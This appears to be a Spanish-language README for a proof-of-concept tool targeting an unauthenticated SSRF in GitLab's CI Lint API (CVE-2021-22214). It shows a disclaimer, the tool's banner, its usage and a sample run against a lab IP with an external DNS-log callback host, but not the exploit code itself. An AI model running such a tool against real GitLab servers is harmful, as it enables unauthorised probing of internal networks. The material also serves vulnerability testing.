
Gitlab CI Lint API - Vulnerabilidad SSRF no autorizada (CVE-2021-22214)
Vulnerabilidad SSRF no autorizada en Gitlab CI Lint API (CVE-2021-22214)
Este artículo y la herramienta son solo para compartir conocimientos técnicos. Está estrictamente prohibido su uso con fines ilegales. Cualquier consecuencia derivada de dicho uso es responsabilidad exclusiva del usuario.
$ python3 gitlab_ssrf.py
===============================================================
_____ _ _ _ _ _____ _____ _____ ______
/ ____(_) | | | | | / ____/ ____| __ \| ____|
| | __ _| |_| | __ _| |__ | (___| (___ | |__) | |__
| | |_ | | __| | / _` | '_ \ \___ \___ \| _ /| __|
| |__| | | |_| |___| (_| | |_) | ____) |___) | | \ \| |
\_____|_|\__|______\__,_|_.__/ |_____/_____/|_| \_\_|
CVE-2021-22214 Powered by r0cky Team ZionLab
===============================================================
Ejemplo:
python3 gitlab_ssrf.py <objetivo> <dnshost>
objetivo: 192.168.80.136

$ python3 gitlab_ssrf.py http://192.168.80.136/ ssrf.sleg0x.dnslog.cn
===============================================================
_____ _ _ _ _ _____ _____ _____ ______
/ ____(_) | | | | | / ____/ ____| __ \| ____|
| | __ _| |_| | __ _| |__ | (___| (___ | |__) | |__
| | |_ | | __| | / _` | '_ \ \___ \___ \| _ /| __|
| |__| | | |_| |___| (_| | |_) | ____) |___) | | \ \| |
\_____|_|\__|______\__,_|_.__/ |_____/_____/|_| \_\_|
CVE-2021-22214 Powered by r0cky Team ZionLab
===============================================================
[+] Posible vulnerabilidad SSRF de GitLab, consulte el registro dnslog.
